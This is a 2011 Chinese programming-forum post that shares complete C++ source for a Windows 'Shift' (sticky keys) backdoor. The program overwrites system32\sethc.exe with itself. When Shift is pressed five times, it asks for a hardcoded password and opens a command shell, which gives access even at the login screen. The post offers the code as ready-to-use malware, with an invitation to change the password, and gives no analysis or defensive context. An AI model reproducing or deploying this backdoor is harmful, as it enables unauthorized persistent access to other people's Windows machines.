| 网站首页 | 业界新闻 | 小组 | 威客 | 人才 | 下载频道 | 博客 | 代码贴 | 在线编程 | 编程论坛
欢迎加入我们,一同切磋技术
用户名:   
 
密 码:  
共有 303 人关注过本帖
标题:大家来看看这个后门源码……
只看楼主 加入收藏
duskfateair
Rank: 1
等 级:新手上路
帖 子:3
专家分:0
注 册:2010-12-12
收藏
 问题点数:0 回复次数:0 
大家来看看这个后门源码……
#include<iostream>
#include<windows.h>
#include<string>
using namespace std;
int main()
{
   void zhuanhuan(char *p); //函数声明 转换大写为小写的函数
   char buf[255];   
   GetModuleFileName(0,buf,256); //调用api复制自己替换ethc.exe文件
   cout<<buf<<endl;
   zhuanhuan(buf);
   if(string(buf)!=string("c:\\windows\\system32\\sethc.exe"))
   {
       cout<<"复制"<<endl;
       CopyFile(buf,"c:\\windows\\system32\\sethc.exe",NULL);
       cout<<"\n\n\t\t\t\tShift后门安装成功"<<endl;
       system("pause");
       return 0;
   }
   string pass;
         cout<<"\n\t\t\t\t 请输入密码:";
   cin>>pass;
   if(pass=="vipver")   //这的vipver是密码,可自己修改!
    system("cmd");
   else
    cout<<"\n\n非法用户,系统授权失败,请联系盖茨!"<<endl;
   return 0;
}
void zhuanhuan(char *p)
{
   while(*p)
   {
    if(*p>='A'&& *p<='Z')
     *p+=32;
    ++p;
   }
}
搜索更多相关主题的帖子: windows 成功 
2011-01-23 10:55
快速回复:大家来看看这个后门源码……
数据加载中...
 
   



关于我们 | 广告合作 | 编程中国 | 清除Cookies | TOP | 手机版

编程中国 版权所有,并保留所有权利。
Powered by Discuz, Processed in 0.018201 second(s), 9 queries.
Copyright©2004-2024, BCCN.NET, All Rights Reserved